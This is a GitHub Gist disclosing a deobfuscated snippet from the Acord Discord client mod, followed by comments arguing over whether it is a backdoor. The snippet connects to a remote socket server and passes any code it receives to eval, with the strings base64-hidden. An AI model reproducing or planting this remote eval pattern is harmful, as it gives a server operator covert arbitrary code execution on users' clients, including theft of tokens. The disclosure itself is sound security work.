Last active
March 20, 2023 12:17
-
-
Save Vendicated/fef37323939e930b52a0e5ec379052bc to your computer and use it in GitHub Desktop.
Acord Eval Backdoor
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // This code can be found in Acord's code in an obfuscated form. Just search for the socket url or one of the atob strings and you will | |
| // find it. | |
| // Permament Link to their Repo (they might delete this): | |
| // https://github.com/AcordPlugin/releases/blob/4944d811f1c5e228c219d4966c5436bdfc6639d3/fixture/extension.js | |
| // Permament Link (fork): | |
| // https://github.com/Vendicated/acord-is-malware/blob/main/fixture/extension.js | |
| // Archive Link: | |
| // https://web.archive.org/web/20230115234723/https://github.com/AcordPlugin/releases/blob/4944d811f1c5e228c219d4966c5436bdfc6639d3/fixture/extension.js | |
| const connection = socketIo.connect("https://socket.acord.app/", { autoConnect: !1, reconnection: !0, transports: ["websocket"] }); | |
| connection.on(atob("OmV2YWx1YXRl") /* :evaluate */, async (code, callback) => { | |
| try { | |
| let data = await window[atob("ZXZhbA==") /* eval */](code); | |
| callback({ ok: true, data: data }); | |
| } catch (t) { | |
| callback({ ok: false, error: `${t}` }); | |
| } | |
| }); |
Also acord has an fully rewrite update in coming, and prob there wont be any evals any more bc acord is not going to make or support its online plugins anymore, but if users donate massively (might happen bc there are lots of user that asking for it) for the online plugins, we might rewrite them, but still there won't be evals, if we had to add an updater this is not going to be happen with eval.
@ErdemGKSL what I dont understand is why the hell it was obfuscated, if you only wanted to update plugins arent there better ways to do it.
What you are doing here is giving yourself ability to execute any command on anyones client running acord which means you can steal tokens and everything, plus being obfuscated makes it only way more suspicious
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Because of Ducko's request, In latest updates this is patched with user approval screen for evals, this was used to update plugins just on time, because plugin versions must match with the server side, calling an updater purposed eval as backdoor is a huge accusation to make. If you don't trust acord to protect your privacy, you could state it as ducko does and wait for an update.